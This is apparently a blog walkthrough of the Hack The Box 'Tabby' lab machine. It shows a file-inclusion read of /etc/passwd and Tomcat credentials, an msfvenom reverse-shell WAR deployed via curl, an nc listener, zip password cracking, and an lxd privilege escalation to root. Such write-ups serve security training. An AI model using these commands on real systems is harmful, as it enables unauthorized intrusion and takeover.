Hack The Box - Tabby Writeup

7 minute read

Hack The Box - Tabby image1

Enumeration

Add tabby to hosts and start an nmap scan.

Nmap

Nmap scan report for tabby.com (10.10.10.194)
Host is up, received user-set (0.21s latency).
Scanned at 2020-06-27 12:53:17 EDT for 2721s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    syn-ack ttl 63 Apache Tomcat
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-title: Apache Tomcat
Uptime guess: 24.982 days (since Tue Jun  2 14:04:40 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   204.45 ms 10.10.14.1
2   201.63 ms tabby.com (10.10.10.194)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 27 13:38:38 2020 -- 1 IP address (1 host up) scanned in 2723.92 seconds

We have an Apache web app running on port 80 and a default tomcat installation on port 8080.

image1

Browsing around we can see that there is a link for a news article with the following url.

http://tabby.com/news.php?file=statement

This look like a prime candidate for LFI

LFI

After some fuzzing I was able to access /etc/passwd. But I couldn’t find any other file that could be interesting.

http://tabby.com/news.php?file=../../../../../../../../../../etc/passwd

image1

Lets see if there is anything interesting in tomcat.

Tomcat

Looking at the default page, we can see that Tomcat has something called host-manger and manager.

image1

The Tomcat Host Manager application enables you to create, delete, and otherwise manage virtual hosts within Tomcat. This how-to guide is best accompanied by the following pieces of documentation:

The Host Container for more information about the underlying xml configuration of virtual hosts and description of attributes.

The Tomcat Host Manager application is a part of Tomcat installation, by default available using the following context: /host-manager. You can use the host manager in the following ways:

Utilizing the graphical user interface, accessible at: {server}:{port}/host-manager/html. Utilizing a set of minimal HTTP requests suitable for scripting. You can access this mode at: {server}:{port}/host-manager/text.

So essentially host-manager is used to manage virtual hosts whereas manager can be used to manage and deploy new applications. There are two ways to access these functionality. Either via GUI or via command line tools such as curl. To access this we require the credentials stored in tomcat-users.xml and also proper access roles must be defined in tomcat-users.xml file. Lets try accessing this file using the LFI in Apache application.

Locating the correct path of tomcat-users.xml can be difficult. As some users pointed out in the htb forum, installing tomcat locally can help you easily identify the location.

We can access the file using

http://tabby.com/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
   <role rolename="admin-gui"/>
   <role rolename="manager-script"/>
   <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>

We have some credential for user tomcat. This user also have access of host-manager GUI and script access as manager.

Low Shell

There is a very interesting feature available using manager-script.

Deploy A New Application Archive (WAR) Remotely

http://localhost:8080/manager/text/deploy?path=/foo

Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.

This command is executed by an HTTP PUT request.

The .WAR file may include Tomcat specific deployment configuration, by including a Context configuration XML file in /META-INF/context.xml.

We can deploy a new application using a PUT request containing the WAR file that contains the web application. And some bad things can happen when an attacker has control of the contents of WAR file.

  1. Create a WAR file using msfvenom 
     msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=1337 -f war > $htb/tabby/shell.
 war

 Payload size: 1093 bytes
 Final size of war file: 1093 bytes
  2. Upload the file via curl PUT request with the credentials in the header and the WAR file as the payload. 
     kali@kali:~/Desktop/htb/tabby$ curl -T shell.war -X PUT tabby.com:8080/manager/text/deploy?path=/shell -H "Authorization: Basic dG9tY2F0OiQzY3VyZVA0czV3MHJkMTIzIQ=="
   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
   0  1092    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0OK - Deployed application at context path [/shell]
 100  1143    0    51  100  1092     34    739  0:00:01  0:00:01 --:--:--   773
  3. Start a nc listener and browse the newly deployed application for our reverse shell. 
    kali@kali:~/Desktop/htb/tabby$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.29] from tabby.com [10.10.10.194] 45882
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$ id
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)

User Shell

Looking around, found a password protected zip file.

tomcat@tabby:/var/www/html/files$ file 16162020_backup.zip
file 16162020_backup.zip
16162020_backup.zip: Zip archive data, at least v1.0 to extract

Transfer it to our system. We can try cracking it using fcrackzip.

kali@kali:~/Desktop/htb/tabby$ fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' bak.zip


PASSWORD FOUND!!!!: pw == admin@it

Try using this in our shell for user ash.

tomcat@tabby:/var/www/html/files$ su ash
su ash
Password: admin@it

ash@tabby:/var/www/html/files$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

And we are ash

Root Shell

Looking at the userid and the home directory, we can see that lxd is used. This is a software used for creating containers. There is a privilege escalation exploit available for this.

kali@kali:~/Desktop/tools$ searchsploit lxd
------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                            |  Path
                                                                                          | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Ubuntu 18.04 - 'lxd' Privilege Escalation                                                 | exploits/linux/local/46978.sh
------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

There is a very convenient lxd exploit script we can use. There is also a detailed writeup regarding this issue. We can run this script to sudo without password.

  1. List the containers.
  2. Run the script with the container name.
  3. Enjoy sudo privileges.
ash@tabby:~$ lxc list
lxc list
+--------+---------+---------------------+-----------------------------------------------+-----------+-----------+
|  NAME  |  STATE  |        IPV4         |                     IPV6                      |   TYPE    | SNAPSHOTS |
+--------+---------+---------------------+-----------------------------------------------+-----------+-----------+
| ignite | RUNNING | 10.12.168.88 (eth0) | fd42:da5d:c449:b95c:216:3eff:fea5:d4e6 (eth0) | CONTAINER | 0         |
+--------+---------+---------------------+-----------------------------------------------+-----------+-----------+
ash@tabby:~$ ./lxd_rootv1.sh ignite
./lxd_rootv1.sh ignite
[+] Stopping container ignite
[+] Setting container security privilege on
[+] Starting container ignite
[+] Mounting host root filesystem to ignite
Error: Invalid devices: Device validation failed "mydevice": More than one disk device uses the same path "/mnt/root"
[+] Using container to add ash to /etc/sudoers
[+] Unmounting host root filesystem from ignite
Error: The device doesn't exist
[+] Resetting container security privilege to off
[+] Stopping the container
[+] Done! Enjoy your sudo superpowers!
ash@tabby:~$ sudo su
sudo su
root@tabby:/home/ash# id
id
uid=0(root) gid=0(root) groups=0(root)

And we are root!

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.